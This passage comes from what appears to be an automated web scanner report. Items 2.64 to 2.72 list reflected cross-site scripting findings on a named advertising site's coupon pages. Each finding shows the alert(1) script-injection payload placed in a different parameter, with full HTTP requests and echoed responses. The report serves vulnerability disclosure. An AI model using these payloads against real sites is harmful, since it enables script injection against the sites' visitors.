Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:44 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=8370453ca2e"><script>alert(1)</script>2688833dcab&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%2
...[SNIP]...

2.64. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [dynamic_proxy parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 846db"><script>alert(1)</script>3e97297b77d was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1846db"><script>alert(1)</script>3e97297b77d&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:00 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:53 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1846db"><script>alert(1)</script>3e97297b77d&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top"
...[SNIP]...

2.65. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8930"><script>alert(1)</script>784bb32d3 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292e8930"><script>alert(1)</script>784bb32d3&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:58 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3259
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:51 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292e8930"><script>alert(1)</script>784bb32d3&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
...[SNIP]...

2.66. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 790de"><script>alert(1)</script>9051fd7fffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1&790de"><script>alert(1)</script>9051fd7fffb=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:11 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3269
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:04 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1&790de"><script>alert(1)</script>9051fd7fffb=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&prima
...[SNIP]...

2.67. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [primary_serv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58fcc"><script>alert(1)</script>222f71544b5 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net58fcc"><script>alert(1)</script>222f71544b5&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
ass="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net58fcc"><script>alert(1)</script>222f71544b5&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup(
...[SNIP]...

2.68. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [pub_cr_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the pub_cr_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d338"><script>alert(1)</script>ad1ca6e1bfb was submitted in the pub_cr_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=86687597482d338"><script>alert(1)</script>ad1ca6e1bfb&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:59 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=86687597482d338"><script>alert(1)</script>ad1ca6e1bfb&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=23329
...[SNIP]...

2.69. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56381"><script>alert(1)</script>70d89b3bb75 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a56381"><script>alert(1)</script>70d89b3bb75&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:56 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:49 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a56381"><script>alert(1)</script>70d89b3bb75&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landin
...[SNIP]...

2.70. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_track_landing_pages parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a4a6"><script>alert(1)</script>d1455ccc13a was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=12a4a6"><script>alert(1)</script>d1455ccc13a HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:09 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:01 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
2&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=12a4a6"><script>alert(1)</script>d1455ccc13a" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary
...[SNIP]...

2.71. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [scid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d28"><script>alert(1)</script>56378b08b00 was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693b9d28"><script>alert(1)</script>56378b08b00&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693b9d28"><script>alert(1)</script>56378b08b00&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26i
...[SNIP]...

2.72. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [se_refer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the se_refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 309b3"><script>alert(1)</script>4eadda684d was submitted in the se_refer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice309b3"><script>alert(1)</script>4eadda684d&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:05 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3261
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
